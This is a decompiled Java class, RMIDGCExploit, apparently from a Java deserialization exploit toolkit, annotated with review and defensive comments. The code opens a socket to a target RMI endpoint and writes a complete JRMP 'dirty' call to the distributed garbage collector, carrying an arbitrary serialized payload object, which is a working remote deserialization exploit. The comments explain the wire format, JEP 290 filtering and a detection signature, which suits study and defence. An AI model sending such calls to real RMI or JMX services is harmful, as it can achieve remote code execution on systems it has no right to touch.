package com.ar3h.chains.core.exploit;

import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.core.exploit.component.MarshalOutputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import javax.net.SocketFactory;

/**
 * Decompiled client that writes a single JRMP call addressed to the RMI distributed garbage
 * collector (DGC) object of {@link #target}, with {@link #payloadObject} as the serialized
 * call argument.
 *
 * <p>The annotation's {@code name} string translates to "deserialization vulnerability in the
 * DGC of JRMP, the protocol underlying RMI".
 *
 * <p>Wire image, as written by {@link #makeDGCCall}: the eight bytes
 * {@code 4A 52 4D 49 00 02 4C 50} ("JRMI", version 2, protocol byte 0x4C, message byte 0x50),
 * followed by whatever {@code MarshalOutputStream} emits for the object id, operation number,
 * interface hash and the argument object. Nothing is ever read back from the socket, so the
 * class learns nothing about how the peer handled the call.
 *
 * <p>Defensive context: the exposure is on the receiving JVM, which deserializes the call
 * argument. JEP 290 serialization filtering (a process-wide {@code jdk.serialFilter} plus the
 * built-in filter the JDK applies to DGC calls) and keeping RMI/JMX listeners off untrusted
 * networks are the standard mitigations; the fixed eight-byte preamble above is a usable
 * network-detection anchor when it arrives from an unexpected source.
 */
@GadgetAnnotation(name = "RMI底层JRMP的dgc存在反序列化漏洞", authors = {Authors.MBECHLER})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/exploit/RMIDGCExploit.class */
public class RMIDGCExploit {
    // Endpoint in "host:port" form. work() splits on ':' and requires exactly two parts, so a
    // value without a port, or an IPv6 literal, results in no connection at all.
    public String target;
    // Object handed to writeObject() as the call argument.
    // NOTE(review): typed String in this decompiled output while makeDGCCall accepts Object —
    // the declared type may be a decompilation artifact; confirm against the caller that sets it.
    public String payloadObject;

    /**
     * Parses {@link #target} and issues one DGC call to it.
     *
     * <p>A target that does not split into exactly two parts is ignored silently. Any exception
     * raised inside the try block (including a non-numeric port) is printed via
     * {@code printStackTrace()} and not propagated. The {@code split} call sits outside the try
     * block, so a {@code null} target surfaces as a {@code NullPointerException} to the caller.
     */
    public void work() {
        String[] split = this.target.split(":");
        if (split.length == 2) {
            try {
                makeDGCCall(split[0], Integer.parseInt(split[1]), this.payloadObject);
            } catch (Exception e) {
                // Best-effort: failures are reported on stderr only; the caller gets no signal.
                e.printStackTrace();
            }
        }
    }

    /**
     * Opens a TCP connection and writes one JRMP call message whose argument is {@code obj}.
     *
     * @param str host name or address to connect to
     * @param i   TCP port to connect to
     * @param obj object serialized as the argument of the call
     * @throws IOException if connecting or writing fails; the socket and stream are closed
     *                     before the exception is rethrown
     */
    public static void makeDGCCall(String str, int i, Object obj) throws IOException {
        // Result is discarded. The constructor still rejects a null host or an out-of-range port
        // and attempts name resolution, so this acts only as an up-front argument check.
        new InetSocketAddress(str, i);
        Socket socket = null;
        DataOutputStream dataOutputStream = null;
        try {
            socket = SocketFactory.getDefault().createSocket(str, i);
            socket.setKeepAlive(true);
            socket.setTcpNoDelay(true);
            OutputStream outputStream = socket.getOutputStream();
            dataOutputStream = new DataOutputStream(outputStream);
            // Transport preamble: 0x4A524D49 is ASCII "JRMI" (the JRMP magic), then version 2.
            dataOutputStream.writeInt(1246907721);
            dataOutputStream.writeShort(2);
            // 0x4C — protocol selector; matches the JDK's single-op protocol constant, where the
            // client sends one message without a handshake (consistent with no read below).
            dataOutputStream.writeByte(76);
            // 0x50 — message type; matches the JDK's "Call" constant.
            dataOutputStream.write(80);
            // NOTE(review): MarshalOutputStream is a project class not shown here; presumably an
            // ObjectOutputStream subclass, in which case a serialization stream header precedes
            // the fields below — confirm against its definition.
            MarshalOutputStream marshalOutputStream = new MarshalOutputStream(dataOutputStream);
            // Object id: object number 2 is the well-known DGC id (java.rmi.server.ObjID.DGC_ID).
            marshalOutputStream.writeLong(2L);
            // The next three writes have the shape of a java.rmi.server.UID (int, long, short),
            // all zero.
            marshalOutputStream.writeInt(0);
            marshalOutputStream.writeLong(0L);
            marshalOutputStream.writeShort(0);
            // Operation number. NOTE(review): 1 presumably selects DGC "dirty" (0 being "clean").
            marshalOutputStream.writeInt(1);
            // Interface hash sent alongside the operation number; presumably the value the JDK's
            // DGC skeleton expects — TODO confirm against the JDK source.
            marshalOutputStream.writeLong(-669196253586618813L);
            // The call argument. This is the object graph the receiving side deserializes, and
            // therefore the part a serialization filter on the server must be able to reject.
            marshalOutputStream.writeObject(obj);
            // Flushes the raw socket stream, not marshalOutputStream.
            // NOTE(review): relies on MarshalOutputStream having already pushed its bytes down.
            outputStream.flush();
            // Cleanup is duplicated in the success and failure paths (typical decompiler
            // rendering of a finally block). Both null checks here are always true.
            if (dataOutputStream != null) {
                dataOutputStream.close();
            }
            if (socket != null) {
                socket.close();
            }
        } catch (Throwable th) {
            // NOTE(review): if dataOutputStream.close() throws here, socket.close() is skipped
            // and that exception replaces th.
            if (dataOutputStream != null) {
                dataOutputStream.close();
            }
            if (socket != null) {
                socket.close();
            }
            throw th;
        }
    }
}
